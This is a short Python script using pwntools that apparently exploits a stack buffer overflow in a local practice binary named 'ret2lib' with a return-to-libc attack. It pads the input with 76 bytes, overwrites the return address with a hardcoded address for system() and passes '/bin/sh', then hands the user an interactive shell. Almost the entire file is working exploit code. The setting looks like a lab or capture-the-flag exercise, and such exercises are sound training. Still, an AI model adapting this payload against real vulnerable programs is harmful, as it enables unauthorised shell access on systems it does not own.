#!/usr/bin/python

from pwn import *

libc_address = 0xf7ded000
system_offset = 0x0003cd10
binsh_offset = 0x17b8cf

system_adderss = libc_address + system_offset
binsh_address = libc_address + binsh_offset

def main():
    # start the process
    p = process("./ret2lib")

    # print the pid
    raw_input(str(p.proc.pid))

    # craft the payload
    payload = "A"*76 
    payload += p32(system_adderss)
    payload += p32(0x41414141) # junk data, you can put exit() address here to let it exit gracefully
    payload += p32(binsh_address)


    f = open('retshell','w')
    f.write(payload)
    f.close()
    # send the payload
    p.send(payload)

    # pass interaction to the user
    p.interactive()

if __name__ == "__main__":
    main()